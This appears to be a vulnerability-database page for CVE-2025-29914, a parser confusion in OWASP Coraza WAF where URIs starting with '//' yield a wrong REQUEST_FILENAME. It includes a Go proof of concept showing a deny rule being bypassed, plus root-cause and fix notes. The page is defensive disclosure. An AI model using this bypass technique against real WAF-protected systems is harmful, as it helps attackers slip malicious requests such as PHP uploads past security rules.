5.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-29914

GHSA ID

GHSA-q9f5-625g-xm39

EPSS Score

0.12485%

CWE

CWE-706

Published

3/20/2025

Updated

3/20/2025

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-29914

CVE-2025-29914:
OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME`

Summary

URLs starting with // are not parsed properly, and the request REQUEST_FILENAME variable contains a wrong value, leading to potential rules bypass.

Details

If a request is made on an URI starting with //, coraza will set a wrong value in REQUEST_FILENAME. For example, if the URI //bar/uploads/foo.php?a=b is passed to coraza: , REQUEST_FILENAME will be set to /uploads/foo.php.

The root cause is the usage of url.Parse to parse the URI in ProcessURI.

url.Parse can parse both absolute URLs (starting with a scheme) or relative ones (just the path). //bar/uploads/foo.php is a valid absolute URI (the scheme is empty), url.Parse will consider bar as the host and the path will be set to /uploads/foo.php.

PoC

package main

import (
	"fmt"
	"net/url"
	"os"

	"github.com/corazawaf/coraza/v3"
)

const testRule = `
SecDebugLogLevel 9
SecDebugLog /dev/stdout
SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
`

func main() {
	var testURL = "//bar/uploads/foo.php"

	if os.Getenv("TEST_URL") != "" {
		testURL = os.Getenv("TEST_URL")
	}

	fmt.Printf("Testing URL: %s\n", testURL)

	config := coraza.NewWAFConfig().WithDirectives(testRule)

	waf, err := coraza.NewWAF(config)

	if err != nil {
		panic(err)
	}

	tx := waf.NewTransaction()

	tx.ProcessURI(testURL, "GET", "HTTP/1.1")

	in := tx.ProcessRequestHeaders()

	if in != nil {
		fmt.Printf("%+v\n", in)
	}
}

Impact

Potential bypass of rules using REQUEST_FILENAME.

(GitHub Advisory)

5.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-29914

GHSA ID

GHSA-q9f5-625g-xm39

EPSS Score

0.12485%

CWE

CWE-706

Published

3/20/2025

Updated

3/20/2025

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/jptosso/coraza-waf	go
github.com/corazawaf/coraza/v3	go

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems directly from the use of url.Parse() in the ProcessURI function, as shown in the commit diff that specifically replaces it with url.ParseRequestURI. The security advisory explicitly identifies this function as the root cause, and the provided PoC demonstrates how malformed URIs lead to incorrect path parsing. The added test cases in transaction_test.go further validate() that the vulnerability existed in this specific function's URI handling logic.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry URLs st*rtin* wit* `//` *r* not p*rs** prop*rly, *n* t** r*qu*st `R*QU*ST_*IL*N*M*` v*ri**l* *ont*ins * wron* v*lu*, l***in* to pot*nti*l rul*s *yp*ss. ### **t*ils I* * r*qu*st is m*** on *n URI st*rtin* wit* `//`, *or*z* will s*t * wr

Reasoning

T** vuln*r**ility st*ms *ir**tly *rom t** us* o* `url.P*rs*()` in t** `Pro**ssURI` *un*tion, *s s*own in t** *ommit *i** t**t sp**i*i**lly r*pl***s it wit* `url.P*rs*R*qu*stURI`. T** s**urity **visory *xpli*itly i**nti*i*s t*is *un*tion *s t** root *

5.4

Basic Information

Concerned about an active attack path?

CVE-2025-29914: OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME`

Summary

Details

PoC

Impact

5.4

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2025-29914:
OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME`

Vulnerability Intelligence
Miggo AI